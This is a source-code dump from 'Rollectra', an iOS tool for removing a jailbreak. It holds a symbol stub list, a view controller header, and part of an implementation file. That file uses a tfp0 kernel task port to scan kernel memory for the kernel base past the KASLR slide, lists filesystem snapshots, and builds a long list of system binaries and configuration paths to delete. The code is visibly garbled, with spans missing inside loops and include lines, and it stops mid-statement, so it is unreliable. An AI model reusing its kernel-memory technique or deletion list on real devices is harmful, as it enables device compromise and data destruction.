_SBWillDisplayMiniAlert, __SBApplicationStateGetMonitor, __SBFScreenTimeNameForCategory, 244 | __SBFScreenTimePostExternalChangeNotification, __SBFScreenTimeRegisterForExternalChangeNotification, 245 | __SBSAutolockTimerPostExternalChangeNotification, 246 | __SBSAutolockTimerRegisterForExternalChangeNotification, __SBSRequestPasscodeUnlockUI, 247 | __SBSRestartGetInfoForIdentifier, __SBSRestartLock, __SBSRestartScheduleBlockForIdentifier, 248 | __SBSRestartSetInfoForIdentifier, __SBSRestartUnlock, 249 | __SBSWhitelistedUnarchiveFromDataWithAllowedClasses, ___SBSEventObserverGetDarwinNotificationFromEvent, 250 | ___sb__mainScreenReferenceBounds, ___sb__runningInSpringBoard, _kSBCarPlayDefaultColumnCount, 251 | _kSBCarPlayDefaultRowCount, _kSBCarPlayDisplaysOEMIcon, _kSBCarPlayHiddenIconKey, 252 | _kSBCarPlayIconOrderKey, _kSBCarPlayMaxColumnsKey, _kSBCarPlayMaxRowsKey, _kSBCarPlayOEMIconLabel, 253 | _kSBCarPlayScreenBoundsKey, _kSBSAlertNotificationCenterName, _kSBSAlertNotificationDate, 254 | _kSBSAlertNotificationSender, _kSBSAlertNotificationType, _kSBSAlertPresentedNotificationName, 255 | _kSBSAnalyticsBreadcrumbTappedKey, _kSBSAnalyticsDeleteIconLocationKey, 256 | _kSBSAnalyticsDeleteIconOptionsKey, _kSBSAnalyticsDeleteIconSelectedOptionKey, 257 | _kSBSAnalyticsDisplayLayoutElementBundleIdKey, _kSBSAnalyticsDisplayLayoutElementIdentifierKey, 258 | _kSBSAnalyticsDisplayLayoutElementLevelKey, _kSBSAnalyticsDisplayLayoutElementUIApplicationKey, 259 | _kSBSAnalyticsDisplayLayoutElementsKey, _kSBSAnalyticsDockSuggestionIndexKey, 260 | _kSBSAnalyticsDockSuggestionTypeKey, _kSBSAnalyticsDockSuggestionsEnabledKey, 261 | _kSBSAnalyticsDockSwipeGestureStateKey, _kSBSAnalyticsEventTypeSpringloadedLocationKey, 262 | _kSBSAnalyticsFloatingApplicationMoveGestureInitialConfigurationKey, 263 | _kSBSAnalyticsFloatingApplicationMoveGestureResultConfigurationKey, 264 | _kSBSAnalyticsFloatingApplicationPinGestureDidSwipeDownKey, 265 | _kSBSAnalyticsFloatingApplicationPinGesturePinActionTypeKey, _kSBSAnalyticsFluidGestureFinalActionKey, 266 | _kSBSAnalyticsFluidGestureTypeKey, _kSBSAnalyticsFolderStatsNumberOfFoldersInDockKey, 267 | _kSBSAnalyticsFolderStatsNumberOfFoldersKey, _kSBSAnalyticsFolderStatsNumberOfItemsInDockKey, 268 | _kSBSAnalyticsFolderStatsNumberOfPagesKey, 269 | _kSBSAnalyticsIconDragSessionDroppedToMedusaDragStartLocationKey, 270 | _kSBSAnalyticsIconDragSessionDroppedToMedusaDropActionKey, _kSBSAnalyticsIconDragSessionIdentifierKey, 271 | _kSBSAnalyticsIconDragSessionItemCountKey, _kSBSAnalyticsIconIndexKey, _kSBSAnalyticsIconIsFolderKey, 272 | _kSBSAnalyticsIconLocationKey, _kSBSAnalyticsLayoutStateElementIdentifiersKey, 273 | _kSBSAnalyticsLayoutStateElementInterfaceOrientationKey, 274 | _kSBSAnalyticsLayoutStateFloatingConfigurationKey, _kSBSAnalyticsLayoutStateInterfaceOrientationKey, 275 | _kSBSAnalyticsLayoutStateSpaceConfigurationKey, _kSBSAnalyticsLayoutStateTransitionSourceKey, 276 | _kSBSAnalyticsLayoutStateUnlockedEnvironmentKey, _kSBSAnalyticsLeftBreadcrumbTypeKey, 277 | _kSBSAnalyticsPIPVideoDidActivateKey, _kSBSAnalyticsReachabilityCancelGestureTypeKey, 278 | _kSBSAnalyticsRightBreadcrumbTypeKey, _kSBSAnalyticsSideApplicationMoveGestureInitialConfigurationKey, 279 | _kSBSAnalyticsSideApplicationMoveGestureResultConfigurationKey, _kSBSAnalyticsSwipeUpFinalActionKey, 280 | _kSBSAnalyticsSwipeUpLiftOffVelocityAngleKey, _kSBSAnalyticsSwipeUpLiftOffVelocityXKey, 281 | _kSBSAnalyticsSwipeUpLiftOffVelocityYKey, _kSBSAnalyticsSwipeUpOrientationKey, 282 | _kSBSAnalyticsSwipeUpPeakVelocityKey, _kSBSAnalyticsSwipeUpTimestampDeltaKey, 283 | _kSBSAnalyticsSwipeUpXCoordKey, _kSBSAnalyticsSwipeUpYCoordKey, _kSBSAnalyticsSwitcherIndexKey, 284 | _kSBSAnalyticsSwitcherTypeKey, _kSBSAnalyticsSystemGestureStateKey, _kSBSAnalyticsSystemGestureTypeKey, 285 | _kSBSAnalyticsTimestampKey, _kSBSApplicationBiometricsServiceMessageKeyCredentialSet, 286 | _kSBSApplicationCarPlayServiceClientMessageKeyHiddenIcons, 287 | _kSBSApplicationCarPlayServiceClientMessageKeyVehicleIdentifier, 288 | _kSBSApplicationCarPlayServiceMessageKeyIconState, 289 | _kSBSApplicationCarPlayServiceServerMessageKeyDisplayName, 290 | _kSBSApplicationCarPlayServiceServerMessageKeyIconImage, 291 | _kSBSApplicationCarPlayServiceServerMessageKeyIconImageScale, 292 | _kSBSApplicationHarmonyServiceClientMessageKeyDisplayId, 293 | _kSBSApplicationHarmonyServiceServerMessageKeyWhitePointAdaptivityStyle, 294 | _kSBSApplicationServiceMessageKeyBundleIdentifier, _kSBSApplicationShortcutContactIconFirstNameKey, 295 | _kSBSApplicationShortcutContactIconIdentifierKey, _kSBSApplicationShortcutContactIconImageDataKey, 296 | _kSBSApplicationShortcutContactIconLastNameKey, _kSBSApplicationShortcutItemTypeSendBetaFeedback, 297 | _kSBSApplicationShortcutItemTypeSendBetaFeedbackUserInfoItemIDKey, 298 | _kSBSApplicationShortcutServiceClientMessageKeyDynamicApplicationShortcutItems, 299 | _kSBSApplicationShortcutServiceClientMessageKeyItemTypes, 300 | _kSBSApplicationShortcutServiceFetchResultDynamicApplicationShortcutItemsKey, 301 | _kSBSApplicationShortcutServiceFetchResultStaticApplicationShortcutItemsKey, 302 | _kSBSApplicationShortcutServiceServerMessageKeyResult, _kSBSApplicationShortcutSystemIconTypeKey, 303 | _kSBSApplicationShortcutTemplateIconNameKey, _kSBSCardItemBodyKey, _kSBSCardItemBundleName, 304 | _kSBSCardItemCategoryIdentifierKey, _kSBSCardItemIconDataKey, _kSBSCardItemIdentifierKey, 305 | _kSBSCardItemRequiresPasscodeKey, _kSBSCardItemSubtitleKey, _kSBSCardItemTitleKey, 306 | _kSBSCardItemUserInfoKey, _kSBSHardwareButtonServiceMessageKeyButtonKind, 307 | _kSBSHardwareButtonServiceMessageKeyEventMask, _kSBSHardwareButtonServiceMessageKeyEventType, 308 | _kSBSHardwareButtonServiceMessageKeyHapticType, _kSBSHardwareButtonServiceMessageKeyPriority, 309 | _kSBSLockStateNotifyKey, _kSBSRemoteAlertServiceClientMessageKeyActivationContext, 310 | _kSBSRemoteAlertServiceClientMessageKeyConfigurationContext, 311 | _kSBSRemoteAlertServiceClientMessageKeyCreateIfNone, _kSBSRemoteAlertServiceClientMessageKeyDefinition, 312 | _kSBSRemoteAlertServiceClientMessageKeyRemoteAlertToken, _kSBSRemoteAlertServiceMessageKeyHandleToken, 313 | _kSBSRemoteAlertServiceServerMessageKeyActive, _kSBSRemoteAlertServiceServerMessageKeyHandleInfos, 314 | _kSBSRemoteAlertServiceServerMessageKeyInvalidationReason, 315 | _kSBSRemoteAlertServiceServerMessageKeyInvalidationUnderlyingError, 316 | _kSBSStatusBarStyleOverridesAssertionExclusiveKey, _kSBSStatusBarStyleOverridesAssertionOverridesKey, 317 | _kSBSStatusBarStyleOverridesAssertionPIDKey, 318 | _kSBSStatusBarStyleOverridesAssertionShowsWhenForegroundKey, 319 | _kSBSStatusBarStyleOverridesAssertionStatusStringKey, 320 | _kSBSStatusBarStyleOverridesAssertionUniqueIdentifierKey, _kSBSStatusBarTapContextStyleOverrideKey, 321 | _kSBSSystemBiometricsServiceMessageKeyCredentialSet, 322 | _kSBSSystemHardwareButtonServiceClientMessageKeyAssertionReason, 323 | _kSBSSystemHardwareButtonServiceClientMessageKeyAssertionType, 324 | _kSBSSystemHardwareButtonServiceServerMessageKeyAction, _kSBSWallpaperServiceClientMessageKeyImageData, 325 | _kSBSWallpaperServiceClientMessageKeyVariant, _kSBUserDoneWithRequestedPasscodeUINotification, 326 | _secureAppTypeName ] 327 | objc-classes: [ _SBSAbstractApplicationService, _SBSAbstractFacilityService, _SBSAbstractSystemService, 328 | _SBSAccelerometer, _SBSAcquireAssertionAction, _SBSAnalyticsState, _SBSAppDragLocalContext, 329 | _SBSApplicationCarPlayService, _SBSApplicationClient, _SBSApplicationHarmonyService, 330 | _SBSApplicationRemovabilityService, _SBSApplicationShortcutContactIcon, 331 | _SBSApplicationShortcutCustomImageIcon, _SBSApplicationShortcutIcon, _SBSApplicationShortcutItem, 332 | _SBSApplicationShortcutService, _SBSApplicationShortcutServiceFetchResult, 333 | _SBSApplicationShortcutSystemIcon, _SBSApplicationShortcutTemplateIcon, _SBSAssertion, 334 | _SBSBiometricsService, _SBSCardItem, _SBSCardItemsController, _SBSDisplayLayoutElement, 335 | _SBSHardwareButtonService, _SBSLockScreenPluginService, _SBSRelaunchAction, 336 | _SBSRemoteAlertActivationContext, _SBSRemoteAlertActivationOptions, _SBSRemoteAlertClient, 337 | _SBSRemoteAlertConfiguration, _SBSRemoteAlertConfigurationContext, _SBSRemoteAlertDefinition, 338 | _SBSRemoteAlertHandle, _SBSSecureAppAction, _SBSSecureAppAssertion, _SBSServiceFacilityClient, 339 | _SBSStatusBarStyleOverridesAssertion, _SBSStatusBarStyleOverridesAssertionData, 340 | _SBSStatusBarStyleOverridesAssertionManager, _SBSStatusBarStyleOverridesCoordinator, 341 | _SBSStatusBarTapContextImpl, _SBSSystemServiceClient, _SBSWallpaperClient, _SBSWallpaperService, 342 | _SBScreenTimeTrackingController, _SBSpringBoardDiedDeactivationHandler, __SBSCarPlayApplicationInfo, 343 | __SBSDisplayIdentifiersCache, __SBSHardwareButtonEventConsumerInfo ] 344 | objc-ivars: [ _SBSAbstractFacilityService._client, _SBSAccelerometer._bksMirror, _SBSAccelerometer._delegate, 345 | _SBSAnalyticsState._payload, _SBSAnalyticsState._timestamp, 346 | _SBSAppDragLocalContext._applicationBundleIdentifier, _SBSAppDragLocalContext._cancelsViaScaleAndFade, 347 | _SBSAppDragLocalContext._launchActions, _SBSAppDragLocalContext._launchURL, 348 | _SBSAppDragLocalContext._portaledPreview, _SBSAppDragLocalContext._startLocation, 349 | _SBSApplicationShortcutContactIcon._contactIdentifier, _SBSApplicationShortcutContactIcon._firstName, 350 | _SBSApplicationShortcutContactIcon._imageData, _SBSApplicationShortcutContactIcon._lastName, 351 | _SBSApplicationShortcutCustomImageIcon._dataType, _SBSApplicationShortcutCustomImageIcon._imageData, 352 | _SBSApplicationShortcutCustomImageIcon._isTemplate, _SBSApplicationShortcutItem._activationMode, 353 | _SBSApplicationShortcutItem._bundleIdentifierToLaunch, _SBSApplicationShortcutItem._icon, 354 | _SBSApplicationShortcutItem._localizedSubtitle, _SBSApplicationShortcutItem._localizedTitle, 355 | _SBSApplicationShortcutItem._type, _SBSApplicationShortcutItem._userInfoData, 356 | _SBSApplicationShortcutServiceFetchResult._dynamicApplicationShortcutItems, 357 | _SBSApplicationShortcutServiceFetchResult._staticApplicationShortcutItems, 358 | _SBSApplicationShortcutSystemIcon._type, _SBSApplicationShortcutTemplateIcon._templateImageName, 359 | _SBSAssertion._assertionName, _SBSAssertion._lock, _SBSAssertion._port, _SBSAssertion._reason, 360 | _SBSCardItem._body, _SBSCardItem._bundleName, _SBSCardItem._categoryIdentifier, _SBSCardItem._iconData, 361 | _SBSCardItem._identifier, _SBSCardItem._requiresPasscode, _SBSCardItem._subtitle, 362 | _SBSCardItem._thumbnail, _SBSCardItem._title, _SBSCardItem._userInfo, 363 | _SBSCardItemsController._connected, _SBSCardItemsController._connection, 364 | _SBSCardItemsController._identifier, _SBSHardwareButtonService._consumers, 365 | _SBSHardwareButtonService._homeButtonConfiguration, _SBSHardwareButtonService._lockButtonConfiguration, 366 | _SBSRemoteAlertActivationContext._actions, _SBSRemoteAlertActivationContext._settings, 367 | _SBSRemoteAlertClient._handleObserverQueue, _SBSRemoteAlertClient._portToDeathSentinelMap, 368 | _SBSRemoteAlertClient._portToHandleMap, _SBSRemoteAlertClient._queue, 369 | _SBSRemoteAlertConfigurationContext._actions, _SBSRemoteAlertConfigurationContext._userInfo, 370 | _SBSRemoteAlertConfigurationContext._xpcEndpoint, _SBSRemoteAlertDefinition._forCarPlay, 371 | _SBSRemoteAlertDefinition._impersonatedCarPlayAppIdentifier, _SBSRemoteAlertDefinition._serviceName, 372 | _SBSRemoteAlertDefinition._userInfo, _SBSRemoteAlertDefinition._vcClassName, 373 | _SBSRemoteAlertHandle._active, _SBSRemoteAlertHandle._client, _SBSRemoteAlertHandle._observers, 374 | _SBSRemoteAlertHandle._queue, _SBSRemoteAlertHandle._token, _SBSSecureAppAssertion._actualAssertion, 375 | _SBSSecureAppAssertion._errorHandler, _SBSServiceFacilityClient._numberOfCheckOuts, 376 | _SBSStatusBarStyleOverridesAssertion._assertionData, 377 | _SBSStatusBarStyleOverridesAssertion._invalidationHandler, 378 | _SBSStatusBarStyleOverridesAssertionData._exclusive, _SBSStatusBarStyleOverridesAssertionData._pid, 379 | _SBSStatusBarStyleOverridesAssertionData._showsWhenForeground, 380 | _SBSStatusBarStyleOverridesAssertionData._statusBarStyleOverrides, 381 | _SBSStatusBarStyleOverridesAssertionData._statusString, 382 | _SBSStatusBarStyleOverridesAssertionData._uniqueIdentifier, 383 | _SBSStatusBarStyleOverridesAssertionManager._assertionsByIdentifier, 384 | _SBSStatusBarStyleOverridesAssertionManager._coordinatorCalloutQueue, 385 | _SBSStatusBarStyleOverridesAssertionManager._internalQueue, 386 | _SBSStatusBarStyleOverridesAssertionManager._internalQueue_styleOverrideCoordinator, 387 | _SBSStatusBarStyleOverridesAssertionManager._sbXPCConnection, 388 | _SBSStatusBarStyleOverridesCoordinator._delegate, 389 | _SBSStatusBarStyleOverridesCoordinator._styleOverrides, _SBSStatusBarTapContextImpl._styleOverride, 390 | _SBSSystemServiceClient._buttonEventServiceIsWaitingForServerMessages, 391 | _SBSWallpaperService._callbackQueue, _SBSWallpaperService._client, 392 | _SBSWallpaperService._wasInvalidated, _SBScreenTimeTrackingController._layoutMonitor, 393 | _SBScreenTimeTrackingController._queue, _SBScreenTimeTrackingController._queue_activeCategory, 394 | _SBScreenTimeTrackingController._queue_activeContext, 395 | _SBScreenTimeTrackingController._queue_isPhoneOrFaceTimeActive, 396 | _SBScreenTimeTrackingController._queue_isScreenOn, 397 | _SBScreenTimeTrackingController._queue_lastCategoryChangeTime, 398 | _SBScreenTimeTrackingController._queue_lastLayout, 399 | _SBScreenTimeTrackingController._queue_lastLayoutTransitionContext, 400 | _SBScreenTimeTrackingController._queue_thisCategoryStartTime, 401 | _SBSpringBoardDiedDeactivationHandler._handlerBlockArray, _SBSpringBoardDiedDeactivationHandler._lock, 402 | _SBSpringBoardDiedDeactivationHandler._portDeathSentinel, __SBSCarPlayApplicationInfo._iconImageData, 403 | __SBSCarPlayApplicationInfo._iconImageScale, __SBSCarPlayApplicationInfo._localizedDisplayName, 404 | __SBSDisplayIdentifiersCache._changedBlock, __SBSDisplayIdentifiersCache._changedToken, 405 | __SBSDisplayIdentifiersCache._displayIdentifiers, __SBSDisplayIdentifiersCache._queue, 406 | __SBSHardwareButtonEventConsumerInfo._buttonKind, __SBSHardwareButtonEventConsumerInfo._consumer, 407 | __SBSHardwareButtonEventConsumerInfo._eventMask, __SBSHardwareButtonEventConsumerInfo._eventPriority, 408 | __SBSHardwareButtonEventConsumerInfo._service, __SBSHardwareButtonEventConsumerInfo._valid ] 409 | ... 410 | -------------------------------------------------------------------------------- /Rollectra/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // Rollectra 4 | // 5 | // Created by pwn20wnd on 8/29/18. 6 | // Copyright © 2018 Pwn20wnd. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | @property (weak, nonatomic) IBOutlet UIButton *unjailbreakButton; 13 | @property (weak, nonatomic) IBOutlet UILabel *infoLabel; 14 | @property (weak, nonatomic) IBOutlet UIButton *myButton; 15 | @property (weak, nonatomic) IBOutlet UIButton *aesign_Button; 16 | @property (weak, nonatomic) IBOutlet UISwitch *resetUserDataSwitch; 17 | @property (weak, nonatomic) IBOutlet UILabel *QiLinLabel; 18 | 19 | @end 20 | 21 | -------------------------------------------------------------------------------- /Rollectra/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // Rollectra 4 | // 5 | // Created by pwn20wnd on 8/29/18. 6 | // Copyright © 2018 Pwn20wnd. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #import "ViewController.h" 15 | #include "common.h" 16 | #ifndef WANT_CYDIA 17 | #include "offsets.h" 18 | #include "sploit.h" 19 | #include "kmem.h" 20 | #endif /* WANT_CYDIA */ 21 | #include "QiLin.h" 22 | #include "iokit.h" 23 | 24 | @interface ViewController () 25 | 26 | @end 27 | 28 | @implementation ViewController 29 | 30 | #ifndef WANT_CYDIA 31 | 32 | // https://github.com/JonathanSeals/kernelversionhacker/blob/3dcbf59f316047a34737f393ff946175164bf03f/kernelversionhacker.c#L92 33 | 34 | #define IMAGE_OFFSET 0x2000 35 | #define MACHO_HEADER_MAGIC 0xfeedfacf 36 | #define MAX_KASLR_SLIDE 0x21000000 37 | #define KERNEL_SEARCH_ADDRESS_IOS10 0xfffffff007004000 38 | 39 | #define ptrSize sizeof(uintptr_t) 40 | 41 | static vm_address_t get_kernel_base(mach_port_t tfp0) { 42 | uint64_t addr = 0; 43 | addr = KERNEL_SEARCH_ADDRESS_IOS10+MAX_KASLR_SLIDE; 44 | 45 | while (1) { 46 | char *buf; 47 | mach_msg_type_number_t sz = 0; 48 | kern_return_t ret = vm_read(tfp0, addr, 0x200, (vm_offset_t*)&buf, &sz); 49 | 50 | if (ret) { 51 | goto next; 52 | } 53 | 54 | if (*((uint32_t *)buf) == MACHO_HEADER_MAGIC) { 55 | int ret = vm_read(tfp0, addr, 0x1000, (vm_offset_t*)&buf, &sz); 56 | if (ret != KERN_SUCCESS) { 57 | printf("Failed vm_read %i\n", ret); 58 | goto next; 59 | } 60 | 61 | for (uintptr_t i=addr; i < (addr+0x2000); i+=(ptrSize)) { 62 | mach_msg_type_number_t sz; 63 | int ret = vm_read(tfp0, i, 0x120, (vm_offset_t*)&buf, &sz); 64 | 65 | if (ret != KERN_SUCCESS) { 66 | printf("Failed vm_read %i\n", ret); 67 | exit(-1); 68 | } 69 | if (!strcmp(buf, "__text") && !strcmp(buf+0x10, "__PRELINK_TEXT")) { 70 | return addr; 71 | } 72 | } 73 | } 74 | 75 | next: 76 | addr -= 0x200000; 77 | } 78 | } 79 | #endif /* WANT_CYDIA */ 80 | 81 | int sha1_to_str(const unsigned char *hash, int hashlen, char *buf, size_t buflen) 82 | { 83 | if (buflen < (hashlen*2+1)) { 84 | return -1; 85 | } 86 | 87 | int i; 88 | for (i=0; i0) { 162 | char *bufref = buf; 163 | 164 | for (int i=0; ireturned.commonattr & ATTR_CMN_NAME) { 167 | printf("%s\n", (char*)(&entry->name_info) + entry->name_info.attr_dataoffset); 168 | if (strstr((char*)(&entry->name_info) + entry->name_info.attr_dataoffset, name)) 169 | return 1; 170 | } 171 | bufref += entry->length; 172 | } 173 | } 174 | free(buf); 175 | close(fd); 176 | 177 | if (retcount < 0) { 178 | perror("fs_snapshot_list"); 179 | return -1; 180 | } 181 | 182 | return 0; 183 | } 184 | 185 | // https://github.com/tihmstar/doubleH3lix/blob/4428c660832e98271f5d82f7a9c67e842b814621/doubleH3lix/jailbreak.mm#L645 186 | 187 | extern char* const* environ; 188 | int easyPosixSpawn(NSURL *launchPath,NSArray *arguments) { 189 | NSMutableArray *posixSpawnArguments=[arguments mutableCopy]; 190 | [posixSpawnArguments insertObject:[launchPath lastPathComponent] atIndex:0]; 191 | 192 | int argc=(int)posixSpawnArguments.count+1; 193 | printf("Number of posix_spawn arguments: %d\n",argc); 194 | char **args=(char**)calloc(argc,sizeof(char *)); 195 | 196 | for (int i=0; i= 100 || rv == 0); i++) { 225 | usleep(100000); 226 | rv = access(filename, F_OK); 227 | } 228 | return rv; 229 | } 230 | 231 | NSArray *getCleanUpFileList() { 232 | NSMutableArray *array = nil; 233 | array = [[NSMutableArray alloc] init]; 234 | // Electra 235 | [array addObject:@"/electra"]; 236 | [array addObject:@"/usr/lib/libjailbreak.dylib"]; 237 | [array addObject:@"/private/var/mobile/test.txt"]; 238 | [array addObject:@"/.bit_of_fun"]; 239 | [array addObject:@"/.amfid_success"]; 240 | [array addObject:@"/.bootstrapped_electra"]; 241 | // Electra Bootstrap 242 | [array addObject:@"/Applications/Cydia.app"]; 243 | [array addObject:@"/bin/bash"]; 244 | [array addObject:@"/bin/bunzip2"]; 245 | [array addObject:@"/bin/bzcat"]; 246 | [array addObject:@"/bin/bzip2"]; 247 | [array addObject:@"/bin/bzip2recover"]; 248 | [array addObject:@"/bin/cat"]; 249 | [array addObject:@"/bin/chgrp"]; 250 | [array addObject:@"/bin/chmod"]; 251 | [array addObject:@"/bin/chown"]; 252 | [array addObject:@"/bin/cp"]; 253 | [array addObject:@"/bin/date"]; 254 | [array addObject:@"/bin/dd"]; 255 | [array addObject:@"/bin/dir"]; 256 | [array addObject:@"/bin/echo"]; 257 | [array addObject:@"/bin/egrep"]; 258 | [array addObject:@"/bin/false"]; 259 | [array addObject:@"/bin/fgrep"]; 260 | [array addObject:@"/bin/grep"]; 261 | [array addObject:@"/bin/gtar"]; 262 | [array addObject:@"/bin/gunzip"]; 263 | [array addObject:@"/bin/gzexe"]; 264 | [array addObject:@"/bin/gzip"]; 265 | [array addObject:@"/bin/kill"]; 266 | [array addObject:@"/bin/ln"]; 267 | [array addObject:@"/bin/ls"]; 268 | [array addObject:@"/bin/mkdir"]; 269 | [array addObject:@"/bin/mknod"]; 270 | [array addObject:@"/bin/mktemp"]; 271 | [array addObject:@"/bin/mv"]; 272 | [array addObject:@"/bin/pwd"]; 273 | [array addObject:@"/bin/readlink"]; 274 | [array addObject:@"/bin/rm"]; 275 | [array addObject:@"/bin/rmdir"]; 276 | [array addObject:@"/bin/run-parts"]; 277 | [array addObject:@"/bin/sed"]; 278 | [array addObject:@"/bin/sh"]; 279 | [array addObject:@"/bin/sleep"]; 280 | [array addObject:@"/bin/stty"]; 281 | [array addObject:@"/bin/su"]; 282 | [array addObject:@"/bin/sync"]; 283 | [array addObject:@"/bin/tar"]; 284 | [array addObject:@"/bin/touch"]; 285 | [array addObject:@"/bin/true"]; 286 | [array addObject:@"/bin/uname"]; 287 | [array addObject:@"/bin/uncompress"]; 288 | [array addObject:@"/bin/vdir"]; 289 | [array addObject:@"/bin/zcat"]; 290 | [array addObject:@"/bin/zcmp"]; 291 | [array addObject:@"/bin/zdiff"]; 292 | [array addObject:@"/bin/zegrep"]; 293 | [array addObject:@"/bin/zfgrep"]; 294 | [array addObject:@"/bin/zforce"]; 295 | [array addObject:@"/bin/zgrep"]; 296 | [array addObject:@"/bin/zless"]; 297 | [array addObject:@"/bin/zmore"]; 298 | [array addObject:@"/bin/znew"]; 299 | [array addObject:@"/boot"]; 300 | [array addObject:@"/lib"]; 301 | [array addObject:@"/Library/dpkg"]; 302 | [array addObject:@"/Library/LaunchDaemons"]; 303 | [array addObject:@"/mnt"]; 304 | [array addObject:@"/private/etc/alternatives"]; 305 | [array addObject:@"/private/etc/apt"]; 306 | [array addObject:@"/private/etc/default"]; 307 | [array addObject:@"/private/etc/dpkg"]; 308 | [array addObject:@"/private/etc/profile"]; 309 | [array addObject:@"/private/etc/profile.d"]; 310 | [array addObject:@"/private/etc/ssh"]; 311 | [array addObject:@"/private/etc/ssl"]; 312 | [array addObject:@"/private/var/backups"]; 313 | [array addObject:@"/private/var/cache"]; 314 | [array addObject:@"/private/var/empty"]; 315 | [array addObject:@"/private/var/lib"]; 316 | [array addObject:@"/private/var/local"]; 317 | [array addObject:@"/private/var/lock"]; 318 | [array addObject:@"/private/var/log/apt"]; 319 | [array addObject:@"/private/var/spool"]; 320 | [array addObject:@"/sbin/dmesg"]; 321 | [array addObject:@"/sbin/dynamic_pager"]; 322 | [array addObject:@"/sbin/halt"]; 323 | [array addObject:@"/sbin/nologin"]; 324 | [array addObject:@"/sbin/reboot"]; 325 | [array addObject:@"/sbin/update_dyld_shared_cache"]; 326 | [array addObject:@"/usr/bin/apt-key"]; 327 | [array addObject:@"/usr/bin/arch"]; 328 | [array addObject:@"/usr/bin/bashbug"]; 329 | [array addObject:@"/usr/bin/c_rehash"]; 330 | [array addObject:@"/usr/bin/captoinfo"]; 331 | [array addObject:@"/usr/bin/cfversion"]; 332 | [array addObject:@"/usr/bin/clear"]; 333 | [array addObject:@"/usr/bin/cmp"]; 334 | [array addObject:@"/usr/bin/db_archive"]; 335 | [array addObject:@"/usr/bin/db_checkpoint"]; 336 | [array addObject:@"/usr/bin/db_deadlock"]; 337 | [array addObject:@"/usr/bin/db_dump"]; 338 | [array addObject:@"/usr/bin/db_hotbackup"]; 339 | [array addObject:@"/usr/bin/db_load"]; 340 | [array addObject:@"/usr/bin/db_log_verify"]; 341 | [array addObject:@"/usr/bin/db_printlog"]; 342 | [array addObject:@"/usr/bin/db_recover"]; 343 | [array addObject:@"/usr/bin/db_replicate"]; 344 | [array addObject:@"/usr/bin/db_sql_codegen"]; 345 | [array addObject:@"/usr/bin/db_stat"]; 346 | [array addObject:@"/usr/bin/db_tuner"]; 347 | [array addObject:@"/usr/bin/db_upgrade"]; 348 | [array addObject:@"/usr/bin/db_verify"]; 349 | [array addObject:@"/usr/bin/dbsql"]; 350 | [array addObject:@"/usr/bin/df"]; 351 | [array addObject:@"/usr/bin/diff"]; 352 | [array addObject:@"/usr/bin/diff3"]; 353 | [array addObject:@"/usr/bin/dirname"]; 354 | [array addObject:@"/usr/bin/dpkg"]; 355 | [array addObject:@"/usr/bin/dpkg-architecture"]; 356 | [array addObject:@"/usr/bin/dpkg-buildflags"]; 357 | [array addObject:@"/usr/bin/dpkg-buildpackage"]; 358 | [array addObject:@"/usr/bin/dpkg-checkbuilddeps"]; 359 | [array addObject:@"/usr/bin/dpkg-deb"]; 360 | [array addObject:@"/usr/bin/dpkg-distaddfile"]; 361 | [array addObject:@"/usr/bin/dpkg-divert"]; 362 | [array addObject:@"/usr/bin/dpkg-genbuildinfo"]; 363 | [array addObject:@"/usr/bin/dpkg-genchanges"]; 364 | [array addObject:@"/usr/bin/dpkg-gencontrol"]; 365 | [array addObject:@"/usr/bin/dpkg-gensymbols"]; 366 | [array addObject:@"/usr/bin/dpkg-maintscript-helper"]; 367 | [array addObject:@"/usr/bin/dpkg-mergechangelogs"]; 368 | [array addObject:@"/usr/bin/dpkg-name"]; 369 | [array addObject:@"/usr/bin/dpkg-parsechangelog"]; 370 | [array addObject:@"/usr/bin/dpkg-query"]; 371 | [array addObject:@"/usr/bin/dpkg-scanpackages"]; 372 | [array addObject:@"/usr/bin/dpkg-scansources"]; 373 | [array addObject:@"/usr/bin/dpkg-shlibdeps"]; 374 | [array addObject:@"/usr/bin/dpkg-source"]; 375 | [array addObject:@"/usr/bin/dpkg-split"]; 376 | [array addObject:@"/usr/bin/dpkg-statoverride"]; 377 | [array addObject:@"/usr/bin/dpkg-trigger"]; 378 | [array addObject:@"/usr/bin/dpkg-vendor"]; 379 | [array addObject:@"/usr/bin/find"]; 380 | [array addObject:@"/usr/bin/getconf"]; 381 | [array addObject:@"/usr/bin/getty"]; 382 | [array addObject:@"/usr/bin/gpg"]; 383 | [array addObject:@"/usr/bin/gpg-zip"]; 384 | [array addObject:@"/usr/bin/gpgsplit"]; 385 | [array addObject:@"/usr/bin/gpgv"]; 386 | [array addObject:@"/usr/bin/gssc"]; 387 | [array addObject:@"/usr/bin/hostinfo"]; 388 | [array addObject:@"/usr/bin/infocmp"]; 389 | [array addObject:@"/usr/bin/infotocap"]; 390 | [array addObject:@"/usr/bin/iomfsetgamma"]; 391 | [array addObject:@"/usr/bin/killall"]; 392 | [array addObject:@"/usr/bin/ldrestart"]; 393 | [array addObject:@"/usr/bin/locate"]; 394 | [array addObject:@"/usr/bin/login"]; 395 | [array addObject:@"/usr/bin/lzcat"]; 396 | [array addObject:@"/usr/bin/lzcmp"]; 397 | [array addObject:@"/usr/bin/lzdiff"]; 398 | [array addObject:@"/usr/bin/lzegrep"]; 399 | [array addObject:@"/usr/bin/lzfgrep"]; 400 | [array addObject:@"/usr/bin/lzgrep"]; 401 | [array addObject:@"/usr/bin/lzless"]; 402 | [array addObject:@"/usr/bin/lzma"]; 403 | [array addObject:@"/usr/bin/lzmadec"]; 404 | [array addObject:@"/usr/bin/lzmainfo"]; 405 | [array addObject:@"/usr/bin/lzmore"]; 406 | [array addObject:@"/usr/bin/ncurses6-config"]; 407 | [array addObject:@"/usr/bin/ncursesw6-config"]; 408 | [array addObject:@"/usr/bin/openssl"]; 409 | [array addObject:@"/usr/bin/pagesize"]; 410 | [array addObject:@"/usr/bin/passwd"]; 411 | [array addObject:@"/usr/bin/renice"]; 412 | [array addObject:@"/usr/bin/reset"]; 413 | [array addObject:@"/usr/bin/sbdidlaunch"]; 414 | [array addObject:@"/usr/bin/sbreload"]; 415 | [array addObject:@"/usr/bin/scp"]; 416 | [array addObject:@"/usr/bin/script"]; 417 | [array addObject:@"/usr/bin/sdiff"]; 418 | [array addObject:@"/usr/bin/sftp"]; 419 | [array 